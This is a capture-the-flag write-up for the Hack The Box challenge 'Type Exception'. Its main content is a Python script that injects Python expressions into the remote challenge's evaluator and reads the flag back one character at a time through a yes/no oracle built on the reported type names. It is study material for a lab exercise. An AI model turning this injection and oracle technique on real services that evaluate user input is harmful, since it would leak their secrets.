https://app.hackthebox.com/challenges/429

Description

Type whatever type you want to type - except you must be careful not to type the type of type that’s not allowed!

Exploitation

#!/usr/bin/env python3
from collections import defaultdict
import socket, string, time, sys
from enum import Enum

class Answer(Enum):
    """Classification of a single reply from the challenge service."""

    NO = 0  # reply contained <class 'NoneType'>: the queried check was false
    YES = 1  # reply contained <class 'int'>: the queried check was true
    ERROR = 2  # reply contained "Error": the service reported a failure


# Boolean-query template: the expression yields the int 1 when {check} holds
# and None otherwise, so the type the service reports back answers the query.
if_construction = "(1)if({check})else(None)"

def parse_ip_port(arg):
    """Split an ``"ip:port"`` string into an ``(ip, port)`` tuple with an int port."""
    fields = arg.split(':')
    host = fields[0]
    port = int(fields[1])
    return host, port

def netcat(content, address=None) -> "Answer | None":
    """Send one payload to the challenge service and classify its reply.

    Opens a fresh TCP connection and sends *content*. It then half-closes the
    write side so the service sees end-of-input, and reads until the service
    closes the connection. The socket is always closed, even if an I/O call
    raises.

    Args:
        content: Payload bytes to send.
        address: ``"ip:port"`` string of the service; defaults to
            ``sys.argv[1]`` (the original behaviour).

    Returns:
        Checked in order of precedence on the complete reply:
        ``Answer.ERROR`` if it contains ``Error``;
        ``Answer.YES`` if it contains ``<class 'int'>``;
        ``Answer.NO`` if it contains ``<class 'NoneType'>``;
        otherwise ``None``.
    """
    ip, port = parse_ip_port(sys.argv[1] if address is None else address)
    chunks = []
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.connect((ip, port))
        s.sendall(content)
        s.shutdown(socket.SHUT_WR)
        # Buffer the whole reply before matching: a marker such as
        # b"<class 'int'>" can straddle two recv() chunks.
        while data := s.recv(1024):
            chunks.append(data)
    reply = b"".join(chunks)
    if b"Error" in reply:
        return Answer.ERROR
    if b"<class 'int'>" in reply:
        return Answer.YES
    if b"<class 'NoneType'>" in reply:
        return Answer.NO
    return None

def find_first_index(character, occupied, max_length=100):
    """Return the index of the first occurrence of *character* in the flag.

    Probes the service one candidate index at a time with the check
    ``flag.encode().index(character) is index``.

    Args:
        character: Hex literal of the byte to look for (e.g. ``"0x41"``).
            It is spliced verbatim into the remote expression.
        occupied: Indexes already attributed to other characters; these are
            skipped because they cannot hold *character*.
        max_length: Exclusive upper bound on the indexes probed. Keep it at
            or below 256: the remote ``is`` comparison presumably relies on
            CPython's small-int cache.

    Returns:
        The first index, or ``None`` in two cases: the service reports an
        error (the character is treated as absent), or no index below
        *max_length* matched.
    """
    print("Finding first index: ", end="")
    for index in range(max_length):
        if index in occupied:
            continue
        print(".", end="")
        query = if_construction.format(check=f"flag.encode().index({character})is({index})").encode()
        result = netcat(query)
        if result == Answer.YES:
            print(f" {index}")
            return index
        if result == Answer.ERROR:
            # Presumably the remote bytes.index() raised because the byte
            # does not occur in the flag at all.
            print("Not used")
            return None
    # Terminate the progress line so the next output starts on its own line.
    print(" not found")
    return None

def find_last_index(character, start, occupied, max_length=100):
    """Return the index of the last occurrence of *character* in the flag.

    Probes the service with ``flag.encode().rindex(character) is index`` for
    every candidate index after *start*.

    Args:
        character: Hex literal of the byte (e.g. ``"0x41"``).
        start: Index of the first occurrence; only later indexes are probed.
        occupied: Indexes already attributed to characters; skipped.
        max_length: Exclusive upper bound on the indexes probed.

    Returns:
        The last index, or ``None`` if no index in ``(start, max_length)``
        matched.
    """
    print("Finding last index ", end="")
    for index in range(start + 1, max_length):
        if index in occupied:
            continue
        print(".", end="")
        query = if_construction.format(check=f"flag.encode().rindex({character})is({index})").encode()
        result = netcat(query)
        if result == Answer.YES:
            print(f" {index}")
            return index
    # Terminate the progress line so the next output starts on its own line.
    print(" not found")
    return None

def find_in_between(character: str, first_index: int, last_index: int, count: int, occupied: list[int]) -> list[int]:
    """Find the occurrences of *character* strictly between its first and last index.

    Args:
        character: Hex literal of the byte (e.g. ``"0x41"``).
        first_index: Index of the first occurrence.
        last_index: Index of the last occurrence.
        count: Total number of occurrences; ``count - 2`` remain to be found.
        occupied: Indexes already attributed to characters; skipped.

    Returns:
        The in-between indexes found, in ascending order.
    """
    print(f'Searching for {count - 2} indexes between {first_index} and {last_index}: ', end="")
    if (last_index - first_index + 1) == count:
        # The span first..last is exactly `count` long, so every slot in it
        # must hold this character; no queries are needed.
        found_indexes = list(range(first_index + 1, last_index))
        print(", ".join(map(str, found_indexes)))
        return found_indexes
    # Build a list of the flag's byte values on the remote side.
    # `type(flag.split())` evaluates to `list`; it is presumably spelled this
    # way because the bare name is filtered.
    list_class = "type(flag.split())"
    flag_generator = "((i)for(i)in(flag.encode()))"
    flag_list = f"{list_class}({flag_generator})"
    found_indexes = []
    for char_index in range(first_index + 1, last_index):
        if len(found_indexes) + 2 == count:
            # Every occurrence is accounted for; stop probing.
            break
        if char_index in occupied:
            continue
        print(".", end="")
        # list.pop(i) returns the byte value at index i.
        check_index = if_construction.format(check=f"{flag_list}.pop({char_index})is({character})").encode()
        result = netcat(check_index)
        if result == Answer.YES:
            print(f" {char_index}", end="")
            found_indexes.append(char_index)
    print()
    return found_indexes

def find_count(character, max_count=100):
    """Return how many times *character* occurs in the flag.

    Probes ``flag.encode().count(character) is n`` for n = 1, 2, ...

    Args:
        character: Hex literal of the byte (e.g. ``"0x41"``).
        max_count: Largest count probed (inclusive). The default matches the
            100-index bound used when locating positions, because a character
            cannot occur more often than the flag is long. The previous cap
            of 19 made frequent characters return ``None``. Keep the bound at
            or below 256: the remote ``is`` comparison presumably relies on
            CPython's small-int cache.

    Returns:
        The occurrence count, or ``None`` if no count up to *max_count*
        matched.
    """
    print("Finding count ", end="")
    for count in range(1, max_count + 1):
        print(".", end="")
        check_count = if_construction.format(check=f"flag.encode().count({character})is({count})").encode()
        result = netcat(check_count)
        if result == Answer.YES:
            print(f" {count}")
            return count
    # Terminate the progress line so the next output starts on its own line.
    print(" not found")
    return None
def assemble_flag(found_chars):
    """Rebuild the flag string from the positions recorded for each character.

    Args:
        found_chars: Mapping of character -> dict with an ``"indexes"`` list
            of the positions where that character was found.

    Returns:
        All characters ordered by their recorded index and joined. Indexes
        that no character claimed are simply absent from the result.
    """
    placed = [
        (index, char_str)
        for char_str, char_data in found_chars.items()
        for index in char_data["indexes"]
    ]
    placed.sort(key=lambda item: item[0])
    return "".join(char_str for _, char_str in placed)


def main():
    """Recover the flag one printable character at a time, then print it."""
    if len(sys.argv) != 2:
        sys.exit(f"Usage: python {sys.argv[0]} <ip:port>")
    start_time = time.time()
    occupied_indexes = []
    found_chars = defaultdict(dict)
    for char_str in string.printable:
        char_hex = hex(ord(char_str))
        print(f"Checking <{char_str} {char_hex}>")
        first_index = find_first_index(char_hex, occupied_indexes)
        if first_index is None:
            continue
        char_indexes = [first_index]
        found_chars[char_str]["indexes"] = char_indexes
        occupied_indexes.append(first_index)
        count = find_count(char_hex)
        found_chars[char_str]["count"] = count
        if count is None:
            # Without a count we cannot tell whether more occurrences exist.
            # Keep the first index instead of crashing on `None > 1`.
            print(f"Warning: could not determine count of {char_str!r}")
            continue
        if count < 2:
            continue
        last_index = find_last_index(char_hex, first_index, occupied_indexes)
        if last_index is None:
            # Recording None would break find_in_between and the final sort.
            print(f"Warning: could not find last index of {char_str!r}")
            continue
        char_indexes.append(last_index)
        occupied_indexes.append(last_index)
        if count > 2:
            between = find_in_between(char_hex, first_index, last_index, count, occupied_indexes)
            char_indexes += between
            char_indexes.sort()
            occupied_indexes += between
    print(assemble_flag(found_chars))
    print(f"Finished in {round(time.time() - start_time)} sec.")


if __name__ == "__main__":
    main()

Summary

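Type Exception: reduce the custom rules to a scriptable yes/no check, then take the smallest reliable path to the flag. The script wraps each question as `(1)if(check)else(None)` and reads the reported type back as the answer: `int` means yes, `NoneType` means no, and `Error` means the expression failed. For every printable character it probes the first index, the occurrence count, the last index and any positions in between. It then sorts all recovered positions to rebuild the flag.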